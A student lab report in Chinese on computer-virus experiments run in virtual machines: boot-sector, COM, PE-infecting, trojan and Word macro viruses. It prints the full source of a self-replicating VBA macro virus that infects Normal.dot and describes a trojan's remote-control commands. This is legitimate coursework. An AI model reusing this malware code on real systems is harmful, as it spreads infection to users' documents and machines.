计算机病毒及防治实验报告081310128王晨雨

南京航空航天大学计算机病毒及防治上机实验报告学院：理学院专业：信息与计算科学学号：081310128姓名：王晨雨授课老师：薛明富二〇一六年十二月目录实验一：引导型病毒实验..............................................2实验二：Com病毒实验................................................6实验三：PE文件格式实验.............................................9实验四：32位文件型病毒实验........................................11实验五：简单的木马实验.............................................14实验七：木马病毒清除实验（选做）...................................19实验八：Word宏病毒实验（一）......................................22实验九：Word宏病毒实验（二）......................................27实验十：Linux脚本病毒实验（选做）.................................32实验十二：基于U盘传播的蠕虫病毒实验...............................33实验十三：邮件型病毒实验...........................................36实验十四：Web恶意代码实验.........................................39实验一：引导型病毒实验【实验目的】通过实验，了解引导区病毒的感染对象和感染特征，重点学习引导病毒的感染机制和恢复感染病毒文件的方法，提高汇编语言的使用能力。实验内容引导阶段病毒由软盘感染硬盘实验。通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒，观察病毒发作的现象和步骤，学习病毒的感染机制：阅读和分析病毒的代码。【实验平台】VMWareWorkstation12PROMS-DOS7.10【试验内容】第一步：环境安装安装虚拟机VMWare，在虚拟机环境内安装MS-DOS7.10环境。第二步：软盘感染硬盘1)运行虚拟机，检查目前虚拟硬盘是否含有病毒，图1表示没有病毒正常启动硬盘的状态。2)在附书资源中复制含有病毒的虚拟软盘virus.img3)将含有病毒的软盘插入虚拟机引导，可以看到闪动的字符*^_^*，如图2所示，按任意键进入图3。第三步：验证硬盘已经被感染1)取出虚拟软盘，通过硬盘引导，再次出现了病毒的画面如图4。2)按任意键后正常引导了DOS系统如图5。可见，硬盘已被感染。第四步：硬盘感染软盘1)下载empty.img，并且将它插入虚拟机，启动计算机，由于该盘为空，如图6.2)取出虚拟软盘，从硬盘启动，通过命令formatA:/q快速格式化软盘。可能提示出错，这时只要按R键即可。如图7.3)成功格式化后的结果如图8。4)不要取出虚拟软盘，重新启动虚拟机，这时是从empty.img引导，可以看到病毒的画面，如图9。按任意键进入图10.可见，病毒已经成功由硬盘传染给了软盘。实验截图：1.软盘启动后：2.硬盘启动后：实验二：Com病毒实验【实验目的】1、掌握COM病毒的传播原理。2、掌握MASM611编译工具的使用。【实验平台】1、MS-DOS7.102、MASM611【试验内容】1、安装MS-DOS7.10环境。虚拟机安装该环境亦可，步骤在此不再赘述。2、在MS-DOSC:\MASM目录下安装MASM611，然后将binr目录下的link.exe复制到bin目录下。3、在com目录下复制病毒程序Virus.asm及测试程序源代码BeInfected.asm4、编译链接BeInfected.asm，形成BeInfectedcom测试程序5、编译链接virus.asm，生成病毒程序virus.exe。6、在C:\MASM\Bin目录下建立del.txt文件，并且将“test.com”和病毒代码2“virus.asm”复制到此目录下。7、执行“test.com”观察结果。8、编译并连接“virus.asm”生成“virus.exe”，执行此exe文件以感染“test.com”文件并且自动删除del.txt，而后执行“test.com”可以发现感染后的结果。实验截图：1.编译存储好文件：2.Dos下查看文件夹内容：3.查看TEST的内容：4.运行病毒程序：5.查看感染病毒后文件夹内容：6.查看感染病毒后TEST的内容：实验三：PE文件格式实验【实验目的】了解PE文件基本结构【实验环境】运行环境：Windows2000、Windows9x、WindowsNT以及WindowsXP编译环境：VisualStudio6.0【实验步骤】使用编译环境打开源代码工程，编译后可以生成winpe.exe。预备步骤：找任意一个Win32下的Exe文件作为查看对象。实验内容：运行winpe.exe，并打开任一exe文件，选择不同的菜单，可以查看到exe文件的内部结构。实验截图：感染前感染后第一处：第二处：第三处：第四处：第五处：感染前：感染后：实验四：32位文件型病毒实验【实验目的】了解文件型病毒的基本制造过程了解病毒的感染、破坏机制，进一步认识病毒程序掌握文件型病毒的特征和内在机制【实验环境】运行环境Windows2000、Windows9x、WindowsNT和WindowsXP【实验步骤】目录中的virus.rar包中包括Virus.exe(编译的病毒程序)、软件使用说明书.doc(请仔细阅读)、源代码详解.doc（对代码部分加入了部分注释）以及pll.asm(程序源代码)。Example.rar包中选取的是一个常用程序(ebookedit)安装后的安装目录下的程序，用于测试病毒程序。预备步骤：将example.rar解压到某个目录。解压完毕后，应该在该目录下有Buttons目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe以及keymaker.exe等程序，然后把virus.rar包解压后的Virus.exe复制到该目录中。实验内容：通过运行病毒程序观看各步的提示以了解病毒的内在机制。实验截图：1.感染前准备：2.感染过程：3.感染后：4.感染文件比对实验五：简单的木马实验【实验目的】掌握木马的基本原理【实验环境】WindowsXP操作系统VisualStudio6.0编程环境【实验步骤】（1）复制实验文件到实验的计算机上。其中，SocketListener目录下是木马Server端源代码，SocketCommand目录下是木马Client端源代码。（2）用VisualStudio6.0环境分别编译这两部分代码。（3）运行SocketListener应用程序，也就是启动了木马被控端。（4）运行SocketCommand应用程序，也就是启动了木马的控制端，可以在控制端执行命令来控制被控制端。实验支持的命令参考表：命令命令含义CMD执行应用程序!SHUT退出木马FILEGET获得远程文件EDITCONF编辑配置文件LIST列目录VIEW查看文件内容CDOPEN关CDCDCLOSE开CDREBOOT重启远端计算机实验截图：1.建立连接：2.发送指令及成功后结果：（1）运行程序：（2）关闭木马：（3）获得文件：（4）编辑配置文件：（5）查看文件：（6）查看文件内容：（7）重启计算机：实验七：木马病毒清除实验（选做）【实验目的】掌握木马病毒清除的基本原理【实验平台】Windows32位操作系统VisualStudio7.0编译环境【实验步骤】文件Antitrojan.sln为工程文件。使用VisualStudio编译该工程，生成Antitrojan.exe可执行程序。执行Antitrojan.exe观察执行效果。实验截图：1.确认木马存在：2.进行编译：（1）修改试验机名字：（2）添加查杀代号：（3）添加查杀代码：3.清除成功：实验八：Word宏病毒实验（一）实验目的Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。本实验演示了宏的编写，通过两个简单的宏病毒示例，说明宏的原理及其安全漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。实验所需条件和环境硬件设备：局域网，终端PC机。系统软件：Windows系列操作系统支撑软件：Word2003软件设置：关闭杀毒软；打开Word2003，在工具宏安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visualbasic项目的访问实验环境配置如下图所示：受感染终端受感染Word文档被感染终端宏病毒传播示意图实验内容和分析为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的word文档，否则清除比较麻烦（对每个打开过的文档都要清除）。例1自我复制，感染word公用模板和当前文档代码如下：'Micro-VirusSubDocument_Open()OnErrorResumeNextApplication.DisplayStatusBar=FalseOptions.SaveNormalPrompt=FalseOurcode=ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1,100)SetHost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSetHost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithHostIf.Lines(1.1)'Micro-VirusThen.DeleteLines1,.CountOfLines.InsertLines1,Ourcode.ReplaceLine2,SubDocument_Close()IfThisDocument=nomaltemplateThen.ReplaceLine2,SubDocument_Open()ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithMsgBoxMicroVirusbyContentSecurityLabEndSub打开一个word文档，然后按Alt+F11调用宏编写窗口（工具宏VisualBasic宏编辑器）,在左侧的project—MicrosoftWord对象ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次打开这个word文档，就会执行以上代码，并将自身复制到Normal.dot（word文档的公共模板）和当前文档的ThisDocument中，同时改变函数名（模板中为Document_Close，当前文档为Document_Open），此时所有的word文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。代码解释以上代码的基本执行流程如下：1)进行必要的自我保护Application.DisplayStatusBar=FalseOptions.SaveNormalPrompt=False高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。本例中只是屏蔽状态栏，以免显示